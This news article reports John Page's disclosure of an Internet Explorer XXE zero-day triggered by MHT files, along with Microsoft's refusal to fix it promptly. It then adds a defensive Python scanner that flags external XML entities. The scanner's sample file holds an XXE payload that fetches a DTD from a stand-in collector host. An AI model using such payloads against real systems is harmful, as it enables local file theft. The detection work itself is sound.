Security researcher John Page has published details and test code for an Internet Explorer zero-day exploit that allows hackers to steal files from systems running Windows.
According to Page, this exploit stems from an ‘XXE’ (XML eXternal Entity) vulnerability in Internet Explorer that is triggered when users open an MHT file with the browser. All MHT files open with Internet Explorer by default, as other browsers do not save web pages in this outdated format anymore, instead using the standard HTML file format that still carries support for the format.
Page explains that this vulnerability will allow hackers to “potentially exfiltrate Local files and conduct remote reconnaissance on locally installed Program version information”. This vulnerability usually requires some form of interaction, like double-clicking on an MHT file, but Page further states that “this interaction could be automated and not needed to trigger the vulnerability exploit chain.”
What’s more concerning is that Page has tested this exploit in the latest version of Internet Explorer, v11, with the most recent security patches on Windows 7, Windows 10 and Windows Server 2012 R2 systems.
Although Internet Explorer isn’t as widely used now, users don't need to have it set as their default browser to be affected; they remain vulnerable as long as Internet Explorer is present on their systems.
Page has notified Microsoft of this zero-day exploit; however, they responded with a firm "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
Following this response, Page has taken it upon himself to publish the details of this exploit on his site, as well as a YouTube video demonstrating the vulnerability.
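For defenders triaging MHT files received by mail or download, the following added example (not code from Page's advisory or from Microsoft) decodes every MIME part of an MHT file and flags XML external entity declarations, the construct an XXE attack relies on. The function names, the sample file and the `example.invalid` hosts are constructed for illustration, and it assumes a malicious MHT carries such a declaration in one of its parts.

```python
import base64
import email
import re
from email import policy

# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "pubid" "uri">
# Deliberately loose (case-insensitive) because this is a triage heuristic.
EXT_ENTITY = re.compile(
    r'<!ENTITY\s+(%\s+)?([\w.:-]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+["\'][^"\']*["\'])\s+["\']([^"\']*)["\']',
    re.IGNORECASE)

def scan_mht(raw: bytes):
    """Return (content_location, entity_name, kind, target) for each hit."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        # decode=True undoes base64 / quoted-printable transfer encoding,
        # so a declaration cannot hide behind the MIME encoding.
        text = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        loc = str(part.get("Content-Location", "(no Content-Location)"))
        for m in EXT_ENTITY.finditer(text):
            kind = "parameter" if m.group(1) else "general"
            findings.append((loc, m.group(2), kind, m.group(3)))
    return findings

def build_sample() -> bytes:
    """Constructed MHT: one benign HTML part, one base64 XML part with a DTD."""
    xml = (b'<?xml version="1.0"?>\n<!DOCTYPE r [<!ENTITY % ext SYSTEM '
           b'"http://collector.example.invalid/x.dtd">]>\n<r/>')
    return ('MIME-Version: 1.0\n'
            'Content-Type: multipart/related; boundary="SAMPLE"\n\n'
            '--SAMPLE\nContent-Type: text/html\n'
            'Content-Transfer-Encoding: quoted-printable\n'
            'Content-Location: http://site.example.invalid/page.html\n\n'
            '<html><body class=3D"x">benign</body></html>\n'
            '--SAMPLE\nContent-Type: text/xml\n'
            'Content-Transfer-Encoding: base64\n'
            'Content-Location: http://site.example.invalid/data.xml\n\n'
            + base64.encodebytes(xml).decode() + '--SAMPLE--\n').encode()

if __name__ == "__main__":
    for loc, name, kind, target in scan_mht(build_sample()):
        print(f"{loc}: external {kind} entity '{name}' -> {target}")
```

A hit is a reason to quarantine the file for review rather than proof of malice, since legitimate XML can also declare external entities.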